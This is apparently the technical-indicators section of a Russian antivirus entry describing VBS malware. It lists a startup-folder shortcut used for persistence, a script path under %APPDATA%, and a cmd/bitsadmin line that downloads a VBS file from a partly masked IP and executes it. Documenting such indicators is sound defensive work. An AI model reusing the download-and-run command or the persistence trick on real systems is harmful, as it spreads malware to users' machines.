Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\WshShell.vbs.lnk
- '<SYSTEM32>\wscript.exe' "%APPDATA%\WshShell\WshShell.vbs"
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer /download /priority high "http://13#.#43.40.199/m/WEscr.vbs" "%cd%\Shell.vbs" && start Shell.vbs
- %APPDATA%\WshShell\WshShell.vbs
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''